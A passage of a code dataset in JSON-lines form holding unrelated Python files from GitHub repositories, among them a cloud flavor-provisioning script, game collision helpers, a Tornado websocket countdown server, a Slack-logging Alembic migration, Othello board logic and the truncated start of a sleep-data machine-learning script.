all_matcher_from_rules(rules: List[str]) -> AllMatcher:\n log.debug(\"rules: '%s'\", rules)\n matchers: List[Dict] = []\n for r in rules:\n parts = r.split(\":\", maxsplit=1)\n if len(parts) != 2:\n fail(f\"Invalid match spec: {r} (must have format: ':')\")\n matchers.append({parts[0]: parts[1]})\n return AllMatcher(matchers)\n","repo_name":"kentik/synth_tools","sub_path":"synth_tools/matchers.py","file_name":"matchers.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35399703688","text":"#!/usr/bin/env python3\n\"\"\"\nProvision the flavor data for avocado-cloud testing.\nMaintainer: Charles Shih \n\"\"\"\n\nimport argparse\nimport logging\nimport json\nimport subprocess\n\nLOG = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')\n\nARG_PARSER = argparse.ArgumentParser(\n description=\"Provision the flavor data for avocado-cloud testing.\")\nARG_PARSER.add_argument(\n '--file',\n dest='file',\n action='store',\n help='The file to be provisioned.',\n default='./alibaba_flavors.yaml',\n required=False)\nARG_PARSER.add_argument(\n '--flavor',\n dest='flavor',\n action='store',\n help='Type of instance to test.',\n required=True)\n\nARGS = ARG_PARSER.parse_args()\n\nUTILS_PATH = './utils'\nTEMPLATE_PATH = './templates'\n\n\ndef aliyun_cli(self, cmd):\n LOG.debug(f'Aliyun CLI: {cmd}')\n\n\ndef query_spec(flavor):\n \"\"\"Query instance SPEC.\"\"\"\n\n cmd = 'aliyun ecs DescribeInstanceTypes --InstanceTypes.1 ' + flavor\n p = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)\n if p.returncode != 0:\n LOG.error(p.stdout)\n return None\n\n _data = json.loads(p.stdout)\n specs = _data.get('InstanceTypes', {}).get('InstanceType', [])\n\n for spec in specs:\n if spec.get('InstanceTypeId') == flavor:\n return spec\n\n return None\n\n\ndef extract_info(spec):\n \"\"\"Extract information from the instance SPEC.\"\"\"\n\n info = {}\n info['name'] = spec.get('InstanceTypeId')\n info['cpu'] = spec.get('CpuCoreCount')\n info['memory'] = spec.get('MemorySize')\n info['nic_count'] = spec.get('EniQuantity')\n info['disk_quantity'] = spec.get('DiskQuantity')\n info['private_ip_quantity'] = spec.get('EniPrivateIpAddressQuantity')\n\n if spec.get('LocalStorageAmount'):\n info['disk_count'] = spec.get('LocalStorageAmount')\n info['disk_size'] = spec.get('LocalStorageCapacity')\n info['disk_type'] = spec.get('LocalStorageCategory')\n\n # Some special families use NVMe driver for local disks\n _families = ['ecs.i3', 'ecs.i3g', 'ecs.i4', 'ecs.i4g', 'ecs.d3s']\n if spec.get('InstanceTypeFamily') in _families:\n info['local_disk_driver'] = 'nvme'\n else:\n info['local_disk_driver'] = 'virtio_blk'\n\n # Some special families use NVMe driver for cloud disks\n _families = ['ecs.g7se', 'ecs.ebmg7se', 'ecs.g8y', 'ecs.c8y', 'ecs.r8y', 'ecs.g8i', 'ecs.c8i', 'ecs.r8i', \\\n 'ecs.g8a', 'ecs.g8ae']\n if spec.get('InstanceTypeFamily') in _families:\n info['cloud_disk_driver'] = 'nvme'\n else:\n info['cloud_disk_driver'] = 'virtio_blk'\n\n # Some security-enhanced instance families have 50% encrypted memory\n _families = ['ecs.c7t', 'ecs.g7t', 'ecs.r7t']\n if spec.get('InstanceTypeFamily') in _families:\n info['memory'] = int(info['memory'] * 0.5)\n\n _families = ['ecs.ebmg6a', 'ecs.ebmc6a', 'ecs.ebmr6a', 'ecs.ebmg7a', 'ecs.ebmc7a', 'ecs.ebmr7a', \\\n 'ecs.g6t', 'ecs.c6t', 'ecs.r6t', 'ecs.g7t', 'ecs.c7t', 'ecs.r7t']\n if spec.get('InstanceTypeFamily') in _families:\n info['boot_mode'] = 'uefi'\n else:\n info['boot_mode'] = 'bios'\n\n _families = ['ecs.g6r', 'ecs.c6r', 'ecs.g8y', 'ecs.c8y', 'ecs.r8y']\n if spec.get('InstanceTypeFamily') in _families:\n info['arch'] = 'aarch64'\n else:\n info['arch'] = 'x86_64'\n\n return info\n\n\ndef compile_file(info):\n \"\"\"Compile the data file.\"\"\"\n\n lines = []\n lines.append('Flavor: !mux\\n')\n lines.append('\\n')\n lines.append(' {}:\\n'.format(info.get('name')))\n\n for k, v in info.items():\n lines.append(f' {k}: {v}\\n')\n\n return lines\n\n\ndef dump_file(file, lines):\n \"\"\"Dump the data file.\"\"\"\n\n with open(file, 'w') as f:\n f.writelines(lines)\n\n\nif __name__ == '__main__':\n\n # Query flavor SPEC\n spec = query_spec(ARGS.flavor)\n\n if not spec:\n LOG.error(f'Unable to query SPEC for flavor \"{ARGS.flavor}\".')\n exit(1)\n\n # Analyse SPEC\n info = extract_info(spec)\n\n if not info:\n LOG.error(f'Unable to analyse SPEC for flavor \"{ARGS.flavor}\".')\n exit(1)\n\n # Compile data file\n lines = compile_file(info)\n\n # Dump the data file\n dump_file(ARGS.file, lines)\n\n exit(0)\n","repo_name":"virt-s1/avocado-cloud-scheduler","sub_path":"utils/provision_flavor_data.py","file_name":"provision_flavor_data.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36099768202","text":"# coding: cp949\ndef collisionIntersectRect(_object1, _object2):\n # 레프트 탑 라이트 바텀\n object1_x1, object1_y1, object1_x2, object1_y2 = _object1.getCollisionBox()\n object2_x1, object2_y1, object2_x2, object2_y2 = _object2.getCollisionBox()\n object3_x1, object3_y1, object3_x2, object3_y2 = 0, 0, 0, 0\n\n if (object1_y1 <= object2_y2) and (object1_x2 >= object2_x1) \\\n and (object1_x1 <= object2_x2) and (object1_y2 >= object2_y1):\n #top\n if object1_y1 > object2_y1:\n object3_y1 = object1_y1\n elif object1_y1 <= object2_y1:\n object3_y1 = object2_y1\n #botton\n if object1_y2 < object2_y2:\n object3_y2 = object1_y2\n elif object1_y2 >= object2_y2:\n object3_y2 = object2_y2\n #right\n if object1_x2 < object2_x2:\n object3_x2 = object1_x2\n elif object1_x2 >= object2_x2:\n object3_x2 = object2_x2\n #left\n if object1_x1 > object2_x1:\n object3_x1 = object1_x1\n elif object1_x1 <= object2_x1:\n object3_x1 = object2_x1\n return True, object3_x1, object3_y1, object3_x2, object3_y2\n return False, object3_x1, object3_y1, object3_x2, object3_y2\n\ndef collisionPtInRect(_object, _x, _y):\n if (_object.X - (int)(_object.sizeX / 2) <= _x) and (_object.X + (int)(_object.sizeX / 2) >= _x):\n if (_object.Y - (int)(_object.sizeY / 2) <= _y) and (_object.Y + (int)(_object.sizeY / 2) >= _y):\n return True\n return False\n\ndef collisionAABB(_mainObject, _subObject, _left, _top, _right, _bottom):\n if (_right - _left) > (_bottom - _top):\n if _mainObject.Y > _subObject.Y:\n _mainObject.Y += (_bottom - _top)\n else:\n _mainObject.Y -= (_bottom - _top)\n else:\n if _mainObject.X > _subObject.X:\n _mainObject.X += (_right - _left)\n else:\n _mainObject.X -= (_right - _left)\n\ndef collisionMiniIntersectRect(_object1, _object2):\n object1_x1, object1_y1, object1_x2, object1_y2 = _object1.getCollisionBox()\n object2_x1, object2_y1, object2_x2, object2_y2 = _object2.getCollisionBox()\n\n if object1_x1 > object2_x2: return False\n if object1_x2 < object2_x1: return False\n if object1_y2 < object2_y1: return False\n if object1_y1 > object2_y2: return False\n\n return True","repo_name":"RYUHYEONGSEOK/RHS","sub_path":"CrazyArcade_Packaging/Manager_Collision.py","file_name":"Manager_Collision.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4623604762","text":"x = float(input(\"Quantos Kg de Maças quer comprar? \"))\ny = float(input(\"Quantos Kg de Morango quer comprar? \"))\nz = x+y\nvr = (x*1.8)+(y*2.5)\nif z > 8 or vr > 25:\n d = (10*vr)/100\n vr = vr - d\n print(\"Voce comprou mais de 8 quilos de fruta ou um valor acima de R$ 25 e ganhou 10% de desconto\")\n print(\"Voce ganhou,\", d ,\" reais de desconto pagando no final R$ \",vr)\n\nelse:\n print(\"O valor da sua compra é R$ \",vr )\n","repo_name":"Davi-Augusto-Schmidt/Programas-e-exercicios","sub_path":"Python/2 - Estrutura de Decisão/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39218069828","text":"import random\n\ndef func (spis,N):\n rand_list = []\n for i in range(0,N):\n k = random.randint(0, len(spis)-1)\n rand_list.append(spis[k])\n return rand_list\n\ndef func_max_slov(name_list,rn_list):\n dict_slov = {}\n for nm in name_list:\n dict_slov[nm] = rn_list.count(nm)\n list_txt = list(dict_slov.items())\n list_txt.sort(key=lambda i: i[1])\n list_txt.reverse()\n return list_txt[:1]\n\ndef func_min_symb(rn_list):\n dict_symb = {}\n for i in range(len(rn_list)):\n dict_symb[rn_list[i][0]] = 0\n for i in range(len(rn_list)):\n dict_symb[rn_list[i][0]] += 1\n\n list_symb = list(dict_symb.items())\n list_symb.sort(key=lambda i: i[1])\n\n return list_symb[:1]\n\nlist_name = ['Iren','Andrew','Kate','Jim']\nrn_list = func(list_name,10)\nprint(rn_list)\n\nprint(func_max_slov(list_name,rn_list))\n\nprint(func_min_symb(rn_list))\n\n","repo_name":"goraci0/Lesson-4","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33797270770","text":"import sys\nimport time\nimport os\nimport signal\nimport logging\n\nfrom clint.textui import puts, colored\n\ntry:\n import tornado.httpserver\n import tornado.ioloop\n import tornado.web\n import tornado.options\n import tornado.websocket\nexcept ImportError:\n puts(colored.red('Module tornado not found, use: pip install tornado'))\n sys.exit(1)\n\nserver = None\ncountdown_time = 300\ncountdown_code = 300\ncountdown_state = 'resume'\nws_clients = []\nTEMPLATE_DIR = os.path.join(os.path.dirname(__file__), \"templates\")\nSTATIC_DIR = os.path.join(os.path.dirname(__file__), \"static\")\nFORMAT = \"[%(asctime)-15s] - %(message)s\"\nlogging.basicConfig(format=FORMAT)\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render('index.html')\n\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n\n def open(self):\n logging.info('[ws] connected: {0}'.format(self.request.remote_ip))\n ws_clients.append(self)\n\n def on_message(self, message):\n global countdown_state\n global countdown_code\n global countdown_time\n logging.info('[ws] message received: {0}'.format(message))\n if message == 'resume_pause':\n if countdown_state == 'resume':\n countdown_state = 'pause'\n elif countdown_state == 'pause':\n countdown_state = 'resume'\n self.broadcast(countdown_state)\n elif message == 'restart':\n countdown_code = countdown_time\n else:\n self.broadcast(message)\n\n def broadcast(self, message):\n global ws_clients\n for socket in ws_clients:\n socket.write_message(message)\n\n def on_close(self):\n logging.info('[ws] disconnected: {0}'.format(self.request.remote_ip))\n ws_clients.remove(self)\n\n\napplication = tornado.web.Application([\n (r'/', MainHandler),\n (r'/ws', WSHandler),\n], template_path=TEMPLATE_DIR, static_path=STATIC_DIR, debug=True)\n\n\ndef sig_handler(sig, frame):\n tornado.ioloop.IOLoop.instance().add_callback(shutdown)\n\n\ndef shutdown():\n logging.info('Stopping http server')\n server.stop()\n io_loop = tornado.ioloop.IOLoop.instance()\n io_loop.stop()\n logging.info('Shutdown')\n\n\ndef countdown():\n global countdown_code\n global countdown_time\n global ws_clients\n ioloop = tornado.ioloop.IOLoop.current()\n if countdown_state == 'resume':\n if ws_clients:\n str_time = time.strftime('%M:%S', time.gmtime(countdown_code))\n for s in ws_clients:\n s.write_message(str_time)\n if countdown_code:\n countdown_code -= 1\n else:\n countdown_code = countdown_time\n ioloop.add_timeout(time.time() + 1, countdown)\n\n\ndef main(port=2020, code_time=300):\n global server\n global countdown_time\n tornado.options.parse_command_line()\n server = tornado.httpserver.HTTPServer(application)\n server.listen(port)\n signal.signal(signal.SIGTERM, sig_handler)\n signal.signal(signal.SIGINT, sig_handler)\n logging.info('Server runnig on port %d' % port)\n logging.info('WebSocket: ws://localhost:%d/ws' % port)\n countdown_time = code_time\n countdown()\n tornado.ioloop.IOLoop.instance().start()\n logging.info(\"Exit...\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fabiocerqueira/easydojo","sub_path":"easydojo/panel/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"70190512374","text":"import random\nimport math\n\nclass Warrior:\n def __init__(self, name=\"Warrior\", health=0, attMax=0, blockMax=0):\n self.name = name\n self.health = health\n self.attMax = attMax\n self.blockMax = blockMax\n\n def attack(self):\n attAmt = self.attMax * (random.random() + .5)\n\n return attAmt\n\n def block(self):\n blockAmt = self.blockMax * (random.random() + .5)\n\n return blockAmt\n\nclass Battle:\n def startFight(self, warrior1, warrior2):\n while True:\n if self.getAttackResult(warrior1, warrior2) == \"Game Over\":\n print(\"Game Over\")\n break\n if self.getAttackResult(warrior2, warrior1) == \"Game Over\":\n print(\"Game Over\")\n break\n\n @staticmethod\n def getAttackResult(warriorA, warriorB):\n warriorAAttAmt = warriorA.attack()\n warriorBBlockAmt = warriorB.block()\n\n damage2warriorB = math.ceil(warriorAAttAmt - warriorBBlockAmt)\n\n warriorB.health = warriorB.health = damage2warriorB\n print(\"{} attacks {} and inflicts with {} damages\".format(warriorA.name, warriorB.name, damage2warriorB))\n print(\"{} is down to {} health\".format(warriorB.name, warriorB.health))\n if warriorB.health <= 0:\n print(\"{} has died and {} is Victorious\".format(warriorB.name, warriorA.name))\n return \"Game Over\"\n else:\n return \"Fight Again\"\n\ndef main():\n maximus = Warrior(\"Maximus\", 50, 20, 10)\n galaxon = Warrior(\"Galaxon\", 50, 20, 10)\n\n battle = Battle()\n\n battle.startFight(maximus, galaxon)\n\nmain()","repo_name":"aoko-code/Python","sub_path":"oop/warGame.py","file_name":"warGame.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22746185873","text":"\"\"\"create_tables\n\nRevision ID: 18083b656fc0\nRevises: \nCreate Date: 2019-12-15 18:32:53.036743\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '18083b656fc0'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('slack_workspaces',\n sa.Column('id', sa.String(length=64), nullable=False, comment='Workspace ID'),\n sa.Column('name', sa.String(length=128), nullable=False, comment='Workspace Name'),\n sa.Column('domain', sa.String(length=64), nullable=False, comment='Workspace Domain'),\n sa.Column('email_domain', sa.String(length=64), nullable=True, comment='Workspace Domain'),\n sa.Column('image_34', sa.Text(), nullable=False, comment='Avatar Icon(34)'),\n sa.Column('image_44', sa.Text(), nullable=False, comment='Avatar Icon(44)'),\n sa.Column('image_68', sa.Text(), nullable=False, comment='Avatar Icon(68)'),\n sa.Column('image_88', sa.Text(), nullable=False, comment='Avatar Icon(88)'),\n sa.Column('image_102', sa.Text(), nullable=False, comment='Avatar Icon(102)'),\n sa.Column('image_132', sa.Text(), nullable=False, comment='Avatar Icon(132)'),\n sa.Column('api_token', sa.Text(), nullable=False, comment='API Token'),\n sa.Column('active_flag', sa.Text(), nullable=False, comment='Crawler Active Flag'),\n sa.Column('delete_flag', sa.Boolean(), nullable=False, comment='Delete flag'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('slack_channels',\n sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({team_id}/{channel_id})'),\n sa.Column('local_id', sa.String(length=64), nullable=True, comment='Channel ID'),\n sa.Column('team_id', sa.String(length=64), nullable=True, comment='Workspace ID'),\n sa.Column('name', sa.String(length=128), nullable=False, comment='Channel Name'),\n sa.Column('created', sa.DateTime(), nullable=False, comment='Channel Create Datetime'),\n sa.Column('topic', sa.Text(), nullable=True, comment='Channel Topic'),\n sa.Column('purpose', sa.Text(), nullable=True, comment='Channel Purpose'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['team_id'], ['slack_workspaces.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_slack_channels_local_id'), 'slack_channels', ['local_id'], unique=False)\n op.create_table('slack_members',\n sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({team_id}/{user_id})'),\n sa.Column('user_id', sa.String(length=64), nullable=True, comment='Slack UserID'),\n sa.Column('team_id', sa.String(length=64), nullable=False, comment='Team ID'),\n sa.Column('name', sa.String(length=128), nullable=False, comment='User Name'),\n sa.Column('deleted', sa.Boolean(), nullable=False, comment='Delete Flag'),\n sa.Column('color', sa.String(length=64), nullable=False, comment='Color'),\n sa.Column('real_name', sa.String(length=128), nullable=False, comment='Real Name'),\n sa.Column('tz', sa.String(length=64), nullable=True, comment='Timezone'),\n sa.Column('tz_offset', sa.Integer(), nullable=False, comment='Timezone Offset'),\n sa.Column('image_24', sa.Text(), nullable=False, comment='Avatar Icon(24)'),\n sa.Column('image_32', sa.Text(), nullable=False, comment='Avatar Icon(32)'),\n sa.Column('image_48', sa.Text(), nullable=False, comment='Avatar Icon(48)'),\n sa.Column('image_72', sa.Text(), nullable=False, comment='Avatar Icon(72)'),\n sa.Column('image_192', sa.Text(), nullable=False, comment='Avatar Icon(192)'),\n sa.Column('image_512', sa.Text(), nullable=False, comment='Avatar Icon(2512'),\n sa.Column('is_bot', sa.Boolean(), nullable=False, comment='Bot Flag'),\n sa.Column('is_owner', sa.Boolean(), nullable=False, comment='Owner Flag'),\n sa.Column('is_admin', sa.Boolean(), nullable=False, comment='Admin Flag'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['team_id'], ['slack_workspaces.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_slack_members_user_id'), 'slack_members', ['user_id'], unique=False)\n op.create_table('slack_messages',\n sa.Column('id', sa.String(length=128), nullable=False, comment='Message ID({workspace_id}/{channel_id}/{ts})'),\n sa.Column('channel_id', sa.String(length=64), nullable=True, comment='Channel ID'),\n sa.Column('user_id', sa.String(length=64), nullable=True, comment='User ID(Workspace)'),\n sa.Column('text', sa.Text(), nullable=False, comment='Text Body'),\n sa.Column('ts', sa.String(length=64), nullable=False, comment='Post Timestamp'),\n sa.Column('thread_ts', sa.String(length=64), nullable=True, comment='Thread Timestamp'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['channel_id'], ['slack_channels.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['slack_members.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_slack_messages_ts'), 'slack_messages', ['ts'], unique=False)\n op.create_table('slack_attachments',\n sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({message_id}/{attachment_id})'),\n sa.Column('message_id', sa.String(length=128), nullable=True, comment='Message ID'),\n sa.Column('attachment_id', sa.String(length=64), nullable=True, comment='Attachment id'),\n sa.Column('service_name', sa.String(length=64), nullable=True, comment='サービスの名前(サイト名と思う)'),\n sa.Column('title', sa.String(length=128), nullable=True, comment='ページタイトルと思う'),\n sa.Column('text', sa.Text(), nullable=True, comment='ページの概要'),\n sa.Column('original_url', sa.Text(), nullable=True, comment='URL情報'),\n sa.Column('thumb_url', sa.Text(), nullable=True, comment='サムネイル画像'),\n sa.Column('service_icon', sa.Text(), nullable=True, comment='サイトのアイコンが像'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['message_id'], ['slack_messages.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_slack_attachments_attachment_id'), 'slack_attachments', ['attachment_id'], unique=False)\n op.create_table('slack_files',\n sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({message_id}/{file_id})'),\n sa.Column('message_id', sa.String(length=128), nullable=True, comment='Message ID'),\n sa.Column('file_id', sa.String(length=64), nullable=False, comment='File_ID'),\n sa.Column('title', sa.String(length=128), nullable=True, comment='ファイル名'),\n sa.Column('filetype', sa.String(length=64), nullable=True, comment='ファイル種別'),\n sa.Column('size', sa.Integer(), nullable=True, comment='ファイルサイズ(Byte??)'),\n sa.Column('permalink', sa.Text(), nullable=True, comment='ファイルリンク(パーマリンク)'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['message_id'], ['slack_messages.id'], ),\n sa.PrimaryKeyConstraint('id', 'file_id')\n )\n op.create_index(op.f('ix_slack_files_filetype'), 'slack_files', ['filetype'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_slack_files_filetype'), table_name='slack_files')\n op.drop_table('slack_files')\n op.drop_index(op.f('ix_slack_attachments_attachment_id'), table_name='slack_attachments')\n op.drop_table('slack_attachments')\n op.drop_index(op.f('ix_slack_messages_ts'), table_name='slack_messages')\n op.drop_table('slack_messages')\n op.drop_index(op.f('ix_slack_members_user_id'), table_name='slack_members')\n op.drop_table('slack_members')\n op.drop_index(op.f('ix_slack_channels_local_id'), table_name='slack_channels')\n op.drop_table('slack_channels')\n op.drop_table('slack_workspaces')\n # ### end Alembic commands ###\n","repo_name":"ukyoda/slacklogger","sub_path":"slackapi/migrations/versions/18083b656fc0_create_tables.py","file_name":"18083b656fc0_create_tables.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33310090164","text":"\"\"\"deze module laat zien hoeveel regels input er zijn op de commandline\nlines in de standard input\nInput: any string from the system standard input\nThe output is a message below the command line\n\"\"\"\n\nimport sys\n\ncount = 0\n\nfor line in sys.stdin:\n count += 1\n\nprint(count, \"lines in de standaard input\")\n","repo_name":"fvdldn/training_patient","sub_path":"count-lines.py","file_name":"count-lines.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24240787443","text":"class Board:\n\n # Направления для поиска\n __directions = [(1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1)]\n\n def __init__(self, n):\n \"\"\"\n Настраиваем стартовое состояние доски.\n :param n: Размер доски.\n \"\"\"\n self.n = n\n self.pieces = [None] * self.n\n for i in range(self.n):\n self.pieces[i] = [0]*self.n\n self.pieces[int(self.n / 2) - 1][int(self.n / 2)] = 1\n self.pieces[int(self.n / 2)][int(self.n / 2) - 1] = 1\n self.pieces[int(self.n / 2) - 1][int(self.n / 2) - 1] = -1;\n self.pieces[int(self.n / 2)][int(self.n / 2)] = -1;\n\n def __getitem__(self, index):\n \"\"\"\n Дает возможность использовать индексацию [][].\n \"\"\"\n return self.pieces[index]\n\n def countDiff(self, color):\n \"\"\"\n Подсчитывает разницу между количеством фигур цвета color и -color\n \"\"\"\n count = 0\n for y in range(self.n):\n for x in range(self.n):\n if self[x][y] == color:\n count += 1\n if self[x][y] == -color:\n count -= 1\n return count\n\n def getCount(self, color):\n \"\"\"\n Подсчитывает количество фигур на доске заданного цвета color.\n \"\"\"\n count = 0\n for y in range(self.n):\n for x in range(self.n):\n if self[x][y] == color:\n count += 1\n return count\n\n def get_legal_moves(self, color):\n \"\"\"\n Вычисление возможных ходов для цвета color.\n \"\"\"\n moves = set()\n\n for y in range(self.n):\n for x in range(self.n):\n if self[x][y] == color:\n newmoves = self.get_moves_for_square((x, y))\n moves.update(newmoves)\n return list(moves)\n\n def has_legal_moves(self, color):\n \"\"\"\n Определяем, есть ли возможные ходы для цвета color.\n \"\"\"\n for y in range(self.n):\n for x in range(self.n):\n if self[x][y] == color:\n newmoves = self.get_moves_for_square((x, y))\n if len(newmoves) > 0:\n return True\n return False\n\n def get_moves_for_square(self, square):\n \"\"\"\n Вычисление допустимых ходов для конкретного квадрата square.\n \"\"\"\n (x, y) = square\n color = self[x][y]\n if color == 0:\n return None\n moves = []\n for direction in self.__directions:\n move = self._discover_move(square, direction)\n if move:\n moves.append(move)\n return moves\n\n def execute_move(self, move, color):\n \"\"\"\n Выполняет данный ход move. Переворачивает фигуры, если это необходимо.\n \"\"\"\n flips = [flip for direction in self.__directions\n for flip in self._get_flips(move, direction, color)]\n assert len(list(flips)) > 0\n for x, y in flips:\n self[x][y] = color\n\n def _discover_move(self, origin, direction):\n \"\"\"\n Возвращает конечную точку для допустимого хода, начинающегося в origin.\n Ходим с помощью _increment_move()\n \"\"\"\n x, y = origin\n color = self[x][y]\n flips = []\n for x, y in Board._increment_move(origin, direction, self.n):\n if self[x][y] == 0:\n if flips:\n return x, y\n else:\n return None\n elif self[x][y] == color:\n return None\n elif self[x][y] == -color:\n flips.append((x, y))\n\n def _get_flips(self, origin, direction, color):\n \"\"\"\n Возвращает список фигур, которые нужно передвинуть для хода origin в направлении direction для\n цвета color.\n \"\"\"\n flips = [origin]\n for x, y in Board._increment_move(origin, direction, self.n):\n if self[x][y] == 0:\n return []\n if self[x][y] == -color:\n flips.append((x, y))\n elif self[x][y] == color and len(flips) > 0:\n return flips\n return []\n\n @staticmethod\n def _increment_move(move, direction, n):\n \"\"\"\n Генерируем ход.\n \"\"\"\n move = list(map(sum, zip(move, direction)))\n while all(map(lambda x: 0 <= x < n, move)):\n yield move\n move = list(map(sum, zip(move, direction)))\n","repo_name":"xevolesi/GameAI","sub_path":"othello/OthelloLogic.py","file_name":"OthelloLogic.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8331667374","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split, cross_val_score, StratifiedKFold\nfrom sklearn.svm import SVC\nfrom sklearn import metrics,model_selection\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import accuracy_score, classification_report, confusion_matrix\nimport glob\nfrom scipy import stats\nimport datetime as dt\nfrom sklearn.neural_network import MLPClassifier\nimport tensorflow as tf\nfrom tensorflow.keras import datasets, layers, models\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D,Dropout,Flatten,Dense\n\nACC = pd.read_csv(\"C:/Vs code file/Machine Learning/Machine-Learning/Ac9/acceleration.txt\", sep = ' ',names=['timedelta', 'accX', 'accY', 'accZ'])\nHeartR = pd.read_csv(\"C:/Vs code file/Machine Learning/Machine-Learning/Ac9/heartrate.txt\", sep = ',',names=['timedelta', 'heartrate'])\nSleepL = pd.read_csv(\"C:/Vs code file/Machine Learning/Machine-Learning/Ac9/labeled_sleep.txt\", sep = ' ',names=['timedelta', 'sleep'])\n#C:\\Vs code file\\ML\\Ac8\n\n#check timedelta,min,max of acc,hr,slp\nACC_max_date = ACC[\"timedelta\"].max()\nACC_min_date = ACC[\"timedelta\"].min()\n\nHR_max_date = HeartR[\"timedelta\"].max()\nHR_min_date = HeartR[\"timedelta\"].min()\n\nSlp_max_date = SleepL[\"timedelta\"].max()\nSlp_min_date = SleepL[\"timedelta\"].min()\n\n\nprint(\"ACC max : {0} ACC min : {1}\",ACC_max_date,ACC_min_date)\nprint(\"HR max : {0} HR min : {1}\",HR_max_date,HR_min_date)\nprint(\"Slp max : {0} Slp min : {1}\",Slp_max_date,Slp_min_date)\n\n\n\nACC_new = ACC[(ACC[\"timedelta\"]> ACC_min_date) & (ACC[\"timedelta\"] < ACC_max_date) & (ACC[\"timedelta\"]> HR_min_date) & (ACC[\"timedelta\"] < HR_max_date) &(ACC[\"timedelta\"]> Slp_min_date) & (ACC[\"timedelta\"] < Slp_max_date)]\nHeartR_new = HeartR[(HeartR[\"timedelta\"]> ACC_min_date) & (HeartR[\"timedelta\"] < ACC_max_date) & (HeartR[\"timedelta\"]> HR_min_date) & (HeartR[\"timedelta\"] < HR_max_date) &(HeartR[\"timedelta\"]> Slp_min_date) & (HeartR[\"timedelta\"] < Slp_max_date)]\nSleepL_new = SleepL[(SleepL[\"timedelta\"]> ACC_min_date) & (SleepL[\"timedelta\"] < 